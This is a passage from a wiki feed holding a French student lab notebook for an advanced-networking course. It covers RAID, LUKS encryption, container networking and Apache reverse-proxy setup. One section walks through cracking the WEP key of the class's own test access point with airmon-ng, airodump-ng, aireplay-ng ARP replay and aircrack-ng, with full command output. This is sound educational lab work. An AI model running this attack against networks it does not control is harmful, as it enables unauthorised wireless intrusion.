      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 '''root@IMA5-BANANE:~# cat /proc/mdstat'''&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Nous n'avons qu'une carte SD pour tous les binômes. On crée donc un disque logiciel localement sur /dev/mmcblk1 nous-mêmes pour &lt;br /&gt;
effectuer son cryptage en AES avec un hachage SHA256 et on renseigne un mot de passe de cryptage.&lt;br /&gt;
&lt;br /&gt;
    '''cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1'''&lt;br /&gt;
&lt;br /&gt;
Nous ouvrons la partition Luks, puis nous formatons le disque :&lt;br /&gt;
&lt;br /&gt;
    '''cryptsetup luksOpen /dev/sdb1 banane-crypt&lt;br /&gt;
    mkfs.ext4 /dev/mapper/banane-crypt'''&lt;br /&gt;
&lt;br /&gt;
On monte le disque et on crée un fichier avec du texte dessus.&lt;br /&gt;
&lt;br /&gt;
    '''mount /dev/mapper/banane-crypt /mnt&lt;br /&gt;
    vi /mnt/test.txt'''&lt;br /&gt;
&lt;br /&gt;
On démonte ensuite le disque et on ferme la partition Luks.&lt;br /&gt;
&lt;br /&gt;
    '''umount /mnt&lt;br /&gt;
    cryptsetup luksClose banane-crypt'''&lt;br /&gt;
&lt;br /&gt;
Pour vérifier le cryptage de notre disque, on tente d'accéder de nouveau au disque et on s'aperçoit qu'on nous demande le mot de passe.&lt;br /&gt;
&lt;br /&gt;
    '''cryptsetup luksOpen /dev/sdb1 banane-crypt'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Crackage de clef WEP sur Point d'accès Wi-Fi&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On dispose de deux Zabeth munies chacune d'une clé Wi-Fi. Le point d'accès &amp;quot;banane&amp;quot; a été configuré par le groupe 3, qui a aussi installé les drivers pour ces clefs Wi-Fi&lt;br /&gt;
&lt;br /&gt;
On commence par établir la connexion au point d'accès Wifi banane sur une des Zabeth (la Zabeth17 en l'occurence). En lançant iwconfig, on voit que l'interface wlx000fb5922374 n'est pas active. Pour cela, on configure comme suit le fichier /etc/network/interfaces avec les paramètres de connexion du réseau banane.&lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth17:/home/pifou# cat /etc/network/interfaces'''&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
 &lt;br /&gt;
 source /etc/network/interfaces.d/*&lt;br /&gt;
 &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback &lt;br /&gt;
&lt;br /&gt;
 auto wlx000fb5922374&lt;br /&gt;
 iface wlx000fb5922374 inet static&lt;br /&gt;
  wireless-keymode open&lt;br /&gt;
  wireless-mode managed&lt;br /&gt;
  address 10.2.0.100&lt;br /&gt;
  netmask 255.255.0.0&lt;br /&gt;
  wireless-essid banane&lt;br /&gt;
  wireless-key 01234567891011121314151617&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WEP-1.png]]&lt;br /&gt;
&lt;br /&gt;
On redémarre ensuite les connexions réseau et on démarre l'interface wlx000fb5922374 pour établir la connexion sur banane. Et on vérifie avec iwconfig que la connexion est établie.&lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth17:/home/pifou# service networking restart&lt;br /&gt;
 root@zabeth17:/home/pifou# ifdown wlx000fb5922374&lt;br /&gt;
 root@zabeth17:/home/pifou# ifup wlx000fb5922374'''&lt;br /&gt;
&lt;br /&gt;
[[Fichier:2.png]]&lt;br /&gt;
&lt;br /&gt;
Ensuite, on génère du trafic sur le réseau en envoyant 11000 paquets de type ARP vers 10.2.0.2 l'adresse du point d'accès.&lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth17:/home/pifou# nping --arp-type ARP -c 11000  --flags rst --ttl 2 10.2.0.2'''&lt;br /&gt;
&lt;br /&gt;
 Starting Nping 0.7.60 ( https://nmap.org/nping ) at 2017-12-12 15:13 GMT&lt;br /&gt;
 SENT (0.0373s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
 RCVD (0.2238s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
 SENT (1.0378s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
 RCVD (1.2438s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
 SENT (2.0387s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
 RCVD (2.0638s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
 SENT (3.0399s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
 RCVD (3.0839s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
 SENT (4.0419s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
 RCVD (4.1078s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
 SENT (5.0439s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
 ...&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WEP-5.png]]&lt;br /&gt;
&lt;br /&gt;
Nous mettons à présent la clef Wi-Fi de la deuxième Zabeth (Zabeth15) en mode moniteur pour écouter, et on vérifie que le nom de l'interface est devenu wlan0mon. &lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth15:/home/pifou# airmon-ng start wlx000fb5922266'''&lt;br /&gt;
 &lt;br /&gt;
 Found 3 processes that could cause trouble.&lt;br /&gt;
 If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
 a short period of time, you may want to run 'airmon-ng check kill' &lt;br /&gt;
 &lt;br /&gt;
  PID Name&lt;br /&gt;
 1695 dhclient&lt;br /&gt;
 2949 avahi-daemon&lt;br /&gt;
 2950 avahi-daemon&lt;br /&gt;
 &lt;br /&gt;
 PHY	Interface	Driver		Chipset&lt;br /&gt;
&lt;br /&gt;
 phy0	wlx000fb5922266	p54usb		NetGear, Inc. WG111(v1) rev 2 54 Mbps Wireless [Intersil ISL3887]&lt;br /&gt;
 Interface 15mon is too long for linux so it will be renamed to the old style (wlan#) name.&lt;br /&gt;
 &lt;br /&gt;
	 	(mac80211 monitor mode vif enabled on [phy0]wlan0mon&lt;br /&gt;
	 	(mac80211 station mode vif disabled for [phy0]wlx000fb5922266)&lt;br /&gt;
 &lt;br /&gt;
Ensuite, on trouve le BSSID, CH (channel) et ESSID du réseau Wi-Fi à cracker (banane).&lt;br /&gt;
 &lt;br /&gt;
 '''root@zabeth15:/home/pifou# airodump-ng --encrypt wep wlan0mon'''&lt;br /&gt;
 &lt;br /&gt;
 CH  8 ][ Elapsed: 6 s ][ 2017-12-12 15:04                                         &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                        &lt;br /&gt;
 C4:14:3C:12:61:C2  -67       26        0    0   9  54e. WEP  WEP         BORNE_TEST3                   &lt;br /&gt;
 C4:14:3C:12:61:C1  -61       28        0    0   9  54e. WEP  WEP         BORNE_TEST2                   &lt;br /&gt;
 C4:14:3C:40:78:60  -70       21        0    0   3  54e. WEP  WEP         ananas                        &lt;br /&gt;
 C4:14:3C:40:78:63  -76       20        0    0   3  54e. WEP  WEP         goyave                         &lt;br /&gt;
 C4:14:3C:12:61:C4  -68       25        0    0   9  54e. WEP  WEP         BORNE_TEST5                   &lt;br /&gt;
 C4:14:3C:12:61:C0  -68       27        0    0   9  54e. WEP  WEP         BORNE_TEST1                   &lt;br /&gt;
 C4:14:3C:12:61:C3  -63       25        0    0   9  54e. WEP  WEP         BORNE_TEST4                   &lt;br /&gt;
 C4:14:3C:40:78:61  -73       16        0    0   3  54e. WEP  WEP         banane                        &lt;br /&gt;
 C4:14:3C:40:78:64  -68       14        0    0   3  54e. WEP  WEP         groseille                     &lt;br /&gt;
 C4:14:3C:40:78:65  -74       22        0    0   3  54e. WEP  WEP         reseau1                       &lt;br /&gt;
 C4:14:3C:12:61:C5  -59       24        0    0   9  54e. WEP  WEP         BORNE_TEST6                    &lt;br /&gt;
 C4:14:3C:40:78:62  -72       16        0    0   3  54e. WEP  WEP         durian                        &lt;br /&gt;
 C4:14:3C:40:78:67  -77       16        0    0   3  54e. WEP  WEP         tomate                        &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                               &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 (not associated)   AC:AF:B9:B0:DF:32  -75    0 - 1      0        1  PolytechLille                       &lt;br /&gt;
 (not associated)   B8:08:D7:16:6E:69  -73    0 - 1      0        1                                      &lt;br /&gt;
 (not associated)   60:F4:45:D0:DA:DB  -73    0 - 1      0        2  PolytechLille  &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 '''pifou@zabeth15:~$ su'''&lt;br /&gt;
 Password: &lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth15:/home/pifou# iwconfig'''&lt;br /&gt;
 wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.462 GHz  Tx-Power=17 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Power Management:off&lt;br /&gt;
           &lt;br /&gt;
 enp0s25   no wireless extensions.&lt;br /&gt;
 &lt;br /&gt;
 enp6s0    no wireless extensions.&lt;br /&gt;
 &lt;br /&gt;
 lo        no wireless extensions.&lt;br /&gt;
 &lt;br /&gt;
 docker0   no wireless extensions.&lt;br /&gt;
 &lt;br /&gt;
 vmnet1    no wireless extensions.&lt;br /&gt;
 &lt;br /&gt;
 bridge    no wireless extensions.&lt;br /&gt;
 &lt;br /&gt;
 vethcdea1bf  no wireless extensions.&lt;br /&gt;
 &lt;br /&gt;
 vmnet8    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
On va maintenant surveiller le réseau et capturer les informations qui circulent.&lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth15:/home/pifou# airodump-ng --bssid C4:14:3C:40:78:61 -c 3 -w crack_wep_ungdelatte wlan0mon'''&lt;br /&gt;
&lt;br /&gt;
 # -c 3 précise que le réseau est sur le channel 3.&lt;br /&gt;
 # -w crack_wep_ungdelatte est le fichier qui va stocker les paquets capturés.&lt;br /&gt;
&lt;br /&gt;
 CH  3 ][ Elapsed: 20 mins ][ 2017-12-12 15:18                     &lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  C&lt;br /&gt;
                                                                   &lt;br /&gt;
 C4:14:3C:40:78:61  -64   8    11488        0    0   3  54e. WEP  W&lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En plus de airodump-ng, on génère encore plus de trafic sur le réseau pour éviter d'attendre très longtemps d'avoir assez de paquets.&lt;br /&gt;
&lt;br /&gt;
 '''aireplay-ng -3 -b C4:14:3C:40:78:61 -h 00:0F:B5:92:23:74 wlan0mon'''&lt;br /&gt;
 # -3 précise un ARP Request Replay Attack. &lt;br /&gt;
 # 00:0F:B5:92:23:74 étant l'adresse MAC de l'interface wlx000fb5922374 du premier ordinateur qui connecté sur le réseau. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour finir, on lance le crackage de la clef WEP à partir du fichier .cap créé.&lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth15:/home/pifou# aircrack-ng crack_wep_ungdelatte-01.cap'''&lt;br /&gt;
&lt;br /&gt;
 Opening crack_wep_ungdelatte-01.cap&lt;br /&gt;
 Read 12494 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
&lt;br /&gt;
   1  C4:14:3C:40:78:61  banane                    No data - WEP or WPA&lt;br /&gt;
&lt;br /&gt;
 Choosing first network as target.&lt;br /&gt;
&lt;br /&gt;
 Opening crack_wep_ungdelatte-01.cap&lt;br /&gt;
 Got no data packets from target network!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth15:/home/pifou# airodump-ng --bssid C4:14:3C:40:78:61 -c 3 -w crack_wep_ungdelatte wlan0mon'''&lt;br /&gt;
&lt;br /&gt;
 CH  3 ][ Elapsed: 28 mins ][ 2017-12-12 16:03                     &lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  C&lt;br /&gt;
                                                                   &lt;br /&gt;
 C4:14:3C:40:78:61  -64   0    16423        0    0   3  54e. WEP  W&lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames&lt;br /&gt;
                                                                   &lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth15:/home/pifou# ls'''&lt;br /&gt;
 3D				       Documents&lt;br /&gt;
 Arduino				       Downloads&lt;br /&gt;
 crack_wep_ungdelatte-01.cap	       GIS4_Bernard_Castelein&lt;br /&gt;
 crack_wep_ungdelatte-01.csv	       IMA5sc-ASR&lt;br /&gt;
 crack_wep_ungdelatte-01.kismet.csv     Music&lt;br /&gt;
 crack_wep_ungdelatte-01.kismet.netxml  Pictures&lt;br /&gt;
 crack_wep_ungdelatte-02.cap	       Public&lt;br /&gt;
 crack_wep_ungdelatte-02.csv	       R&lt;br /&gt;
 crack_wep_ungdelatte-02.kismet.csv     replay_arp-1212-153701.cap&lt;br /&gt;
 crack_wep_ungdelatte-02.kismet.netxml  Templates&lt;br /&gt;
 Desktop				       Videos&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth15:/home/pifou# aircrack-ng crack_wep_ungdelatte-02.cap'''&lt;br /&gt;
 Opening crack_wep_ungdelatte-02.cap&lt;br /&gt;
 Read 13001 packets.&lt;br /&gt;
  &lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  C4:14:3C:40:78:61  banane                    No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
 Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
 Opening crack_wep_ungdelatte-02.cap&lt;br /&gt;
 Got no data packets from target network!&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
Le crakage n'ayant pas fonctionné après deux fois, nous avons cherché notre erreur car les paquets récupérés par la Zabeth15 semblent vides, mais nous n'avons pas trouvé...&lt;br /&gt;
&lt;br /&gt;
--- &lt;br /&gt;
&lt;br /&gt;
Réussite en soutenance&lt;br /&gt;
&lt;br /&gt;
En lançant le crack après avoir écouté sur la bonne adresse MAC (terminant par 74), nous avons réussi à trouver la clef WEP, qui correspond bien à celle configurée.&lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# aircrack-ng crack_wep_ungdelatte-03.cap&lt;br /&gt;
Opening crack_wep_ungdelatte-03.cap&lt;br /&gt;
Read 211094 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
&lt;br /&gt;
   1  C4:14:3C:40:78:61  banane                    WEP (30765 IVs)&lt;br /&gt;
&lt;br /&gt;
Choosing first network as target.&lt;br /&gt;
&lt;br /&gt;
Opening crack_wep_ungdelatte-03.cap&lt;br /&gt;
Attack will be restarted every 5000 captured ivs.&lt;br /&gt;
Starting PTW attack with 30887 ivs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                 Aircrack-ng 1.2 rc4&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:00] Tested 24537 keys (got 30676 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    4/  6   EE(37632) 01(37376) 95(37376) 20(36864) CD(36864) &lt;br /&gt;
    1    0/  1   23(43520) 7F(37376) 14(36352) 33(36352) 90(36352) &lt;br /&gt;
    2    0/  2   45(41472) 16(38656) E9(37376) C4(37120) 22(36352) &lt;br /&gt;
    3    0/  2   67(42240) B1(39168) 5B(36864) 15(36608) 0E(36352) &lt;br /&gt;
    4    0/  1   89(42496) 53(38912) 9F(38400) 9D(37888) E6(37888) &lt;br /&gt;
    5    0/  1   10(46080) ED(38656) A1(37888) F9(37888) 34(36608) &lt;br /&gt;
    6    1/  3   11(39680) 97(38144) BC(36352) 18(36096) 21(36096) &lt;br /&gt;
    7    1/  4   12(37632) 57(36608) EA(36352) A6(35840) E8(35840) &lt;br /&gt;
    8    7/ 20   13(36352) 49(36096) 5C(36096) 8D(36096) A3(35840) &lt;br /&gt;
    9    0/  1   14(42240) C7(38912) 30(36864) 47(36864) D5(36864) &lt;br /&gt;
   10    0/  1   15(44544) AF(39424) B6(38144) A9(37632) D8(37120) &lt;br /&gt;
   11    0/  1   16(43008) E7(38144) C2(37888) 07(36864) 16(36864) &lt;br /&gt;
   12    0/  5   17(39936) 1A(38400) 2B(38144) 60(37120) 71(36864) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ 01:23:45:67:89:10:11:12:13:14:15:16:17 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau et création de conteneurs sous Machine Virtuelle Linux&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On se propose dans cette partie de réaliser la création et la mise en réseau de conteneurs sous Linux.&lt;br /&gt;
&lt;br /&gt;
Après avoir créé un système de fichiers avec debootstrap puis une machine virtuelle (IMA5-BANANE en l'occurence) sur le serveur de virtualisation Cordouan, on crée trois conteneurs C1, C2 et C3 distincts au sein celle-ci.&lt;br /&gt;
&lt;br /&gt;
Connecter les conteneurs en réseau :&lt;br /&gt;
&lt;br /&gt;
    créer une double interface Ethernet virtuelle ;&lt;br /&gt;
    sur l’hôte ajouter l’interface dans un pont virtuel ;&lt;br /&gt;
    envoyer le pair dans l’espace réseau du conteneur ;&lt;br /&gt;
    configurer l’adresse IP sur l’interface du conteneur ...&lt;br /&gt;
    ... il peut être nécessaire d’utiliser nsenter. &lt;br /&gt;
&lt;br /&gt;
Pour la création d'un conteneur, on utilise la commande unshare couplée à des options et à une fonction serverx.sh qui ne fait que repeter une fonction sleep 5 en boucle. Elle permet de lancer séparément une commande (ici /bin/serverx.sh) en définissant un root différent.&lt;br /&gt;
&lt;br /&gt;
    '''unshare -n -u -m -p -f chroot ./chroot /bin/serverx.sh'''&lt;br /&gt;
&lt;br /&gt;
Si on veut entrer dans le conteneur après en être sorti, on utilise la commande:&lt;br /&gt;
&lt;br /&gt;
    '''nsenter -n -u -m -p -t &amp;lt;PID&amp;gt; chroot ./chroot /bin/bash'''&lt;br /&gt;
&lt;br /&gt;
On ajoute alors toutes nos interfaces virtuelles eth0@vifX de type veth. Les Ponts &amp;quot;monpont&amp;quot; et &amp;quot;carrefour&amp;quot; ont déjà été définis dans /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
    '''ip link add vif1 type veth peer name eth0@vif1&lt;br /&gt;
    ip link add vif2 type veth peer name eth0@vif2&lt;br /&gt;
    ip link add vif3 type veth peer name eth0@vif3&lt;br /&gt;
    ip link add vif4 type veth peer name eth0@vif4'''&lt;br /&gt;
&lt;br /&gt;
On ajoute les vifx aux ponts correspondants&lt;br /&gt;
&lt;br /&gt;
    '''ip link set vif1 master monpont&lt;br /&gt;
    ip link set vif2 master carrefour &lt;br /&gt;
    ip link set vif3 master carrefour&lt;br /&gt;
    ip link set vif4 master carrefour'''&lt;br /&gt;
 &lt;br /&gt;
On peut vérifier la création à chaque commande grâce aux la commande:&lt;br /&gt;
&lt;br /&gt;
    '''ip l show et brctl show'''&lt;br /&gt;
&lt;br /&gt;
L'adresse ip de &amp;quot;monpont&amp;quot; est défini dans le fichier interfaces avec l'adresse 193.48.57.179 et est connecté au réseau via eth0&lt;br /&gt;
Nous avons choisis le reseau local entre les conteneur sur la plage 192.168.0.0/24. L'adresse de &amp;quot;carrefour&amp;quot; est 192.168.0.1.&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif1 (renommée eth0) comme étant l'interface entre le reverse proxy et &amp;quot;monpont&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
    '''ip link set eth0@vif1 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0'''&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif2 (renommée eth1) comme étant l'interface entre le reverse proxy et les carrefour.&lt;br /&gt;
&lt;br /&gt;
    '''ip link set eth0@vif2 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth1'''&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif3 et eth0@vif4 (renommées eth0) comme étant les interfaces respectives entre le server1, serveur 2 et le pont carrefour.&lt;br /&gt;
&lt;br /&gt;
    '''ip link set eth0@vif3 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0&lt;br /&gt;
    ip link set eth0@vif4 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0'''&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur &amp;quot;chroot&amp;quot;, on ajoute alors l'adresse IP 193.48.57.189/28 à eth0 et on active eth0, vif1 et &amp;quot;monpont&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
    '''ip addr add 193.48.57.189/28 dev eth0&lt;br /&gt;
    ip link set dev eth0 up&lt;br /&gt;
    ip link set vif1 up&lt;br /&gt;
    ip link set dev monpont up'''&lt;br /&gt;
&lt;br /&gt;
Dans le conteneurs serverX et dans le reverse proxy, on ajoute alors les adresse IP 192.168.0.100/24 et 192.168.0.200/24 et 192.168.0.150/24 aux eth0 respectifs puis on active vif2 vif3 vif4 et &amp;quot;carrefour&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Le réseau étant fonctionnel nous pouvons nous attaquer à la configuration des serveur apache2.&lt;br /&gt;
&lt;br /&gt;
Nous avons donc installé un serveur apache2 dans chaque conteneur.&lt;br /&gt;
&lt;br /&gt;
Pour ce qui est du serveur apache qui jouera le rôle de reverse proxy le fichier de configuration se trouvant dans /etc/apache2/sites-available sera configuré de la manière suivante:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ServerName 193.48.57.189:80&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.189:80&amp;gt;&lt;br /&gt;
 ServerName reverse.banane.space&lt;br /&gt;
 DocumentRoot /var/www/html&lt;br /&gt;
 ProxyPass / http://192.168.0.100:631&lt;br /&gt;
 ProxyPassReverse / http://192.168.0.100:631&lt;br /&gt;
 ProxyRequests Off&lt;br /&gt;
 LogFormat &amp;quot;%h %l %u %t \&amp;quot;%r\&amp;quot; %&amp;gt;s %b&amp;quot; common&lt;br /&gt;
 CustomLog logs/access_log common&lt;br /&gt;
 &amp;lt;VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On retrouve l'adresse du serveur apache qui correspond à celle du conteneur relié au réseau 192.48.57.189.&lt;br /&gt;
&lt;br /&gt;
On redirigera les requêtes via le port 631 (TCP/UDP) toutefois il est tout à fais possible de le faire circuler sur le port 80 car les serveurs se trouvent normalement dans des conteneurs.&lt;br /&gt;
&lt;br /&gt;
Au niveau de '''server1'''(équivalent pour server2) j'ai seulement cré un serveur apache2 sous cette forme:&lt;br /&gt;
&lt;br /&gt;
 ServerName 192.168.0.100:631&lt;br /&gt;
 &amp;lt;VirtualHost 192.168.0.100:631&amp;gt;&lt;br /&gt;
 ServerName site1.banane.space&lt;br /&gt;
 DocumentRoot /var/www/html&lt;br /&gt;
 LogFormat &amp;quot;%h %l %u %t \&amp;quot;%r\&amp;quot; %&amp;gt;s %b&amp;quot; common&lt;br /&gt;
 CustomLog logs/access_log common&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
il peut être nécessaire de demander dans ports.conf d'écouter le port 631.&lt;br /&gt;
&lt;br /&gt;
Dans le dns db.banane.space nous avons rajouter les différentes adresses:&lt;br /&gt;
&lt;br /&gt;
 reverse IN	A	193.48.57.189&lt;br /&gt;
 site1   IN	A	193.48.57.189&lt;br /&gt;
 site2	 IN	A	193.48.57.189&lt;br /&gt;
&lt;br /&gt;
Nous n'avons pas réussis à tester le fonctionnement car nous avons rencontré une erreur au niveau de la commande '''nsenter'''. en effet les conteneur ne sont pas isolés des processus extérieurs. Tous nos serveurs apaches ce sont donc installés or des '''unshare''' et forcément ne cohabitent donc pas très bien ensemble. Nous avons trouvé une piste qui serait en lien avec le /proc/self du système. la commande '''nsenter''' ne reconnaît pas les processus monté pas '''mount'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
J'ai créé un script test.conf se trouvant dans /pra.&lt;br /&gt;
Ce script permet de lancer l’ensemble des commande du dessus de façon à créer et configurer les conteneurs d'un seul coup.&lt;br /&gt;
tous le conteneur sont lancé grâce a la commande '''unshare''' avec la commande /bin/config.sh.&lt;br /&gt;
Dans chaque système de fichier des conteneur vous trouverez donc dans /bin un fichier config.sh qui permet de faire les configurations réseaux intra-conteneur et de lancer les serveurs apaches.&lt;br /&gt;
&lt;br /&gt;
Les serveurs apaches ne veulent plus se lancer à cause de l’erreur suivante:&lt;br /&gt;
&lt;br /&gt;
 httpd (pid 23) already running&lt;br /&gt;
 httpd (pid 11) already running&lt;br /&gt;
 httpd (pid 11) already running&lt;br /&gt;
&lt;br /&gt;
les conteneur sont donc détruits car les serveurs apaches qui doivent tourner en tache de fond ne se lance pas.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
configuration des serveurs apaches:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
reverse proxy:&lt;br /&gt;
&lt;br /&gt;
 ServerName 193.48.57.189:80&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.189:80&amp;gt;&lt;br /&gt;
 ServerName reverse.banane.space&lt;br /&gt;
 DocumentRoot /var/www/html&lt;br /&gt;
&lt;br /&gt;
 ProxyPass / http://192.168.0.100:80&lt;br /&gt;
 ProxyPassReverse / http://192.168.0.100:80&lt;br /&gt;
 ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
 ProxyPass / http://192.168.0.200:80&lt;br /&gt;
 ProxyPassReverse / http://192.168.0.200:80&lt;br /&gt;
 ProxyRequests Off&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
server 1 et 2 identique a part adresse IP:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ServerName 192.168.0.100:80&lt;br /&gt;
 &amp;lt;VirtualHost 192.168.0.100:80&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 ServerName site1.banane.space&lt;br /&gt;
 ServerAdmin webmaster@localhost&lt;br /&gt;
 DocumentRoot /var/www/html&lt;br /&gt;
&lt;br /&gt;
 ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
 CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46622</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46622"/>
				<updated>2017-12-13T14:21:49Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Mise en réseau et création de conteneurs sous Machine Virtuelle Linux */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
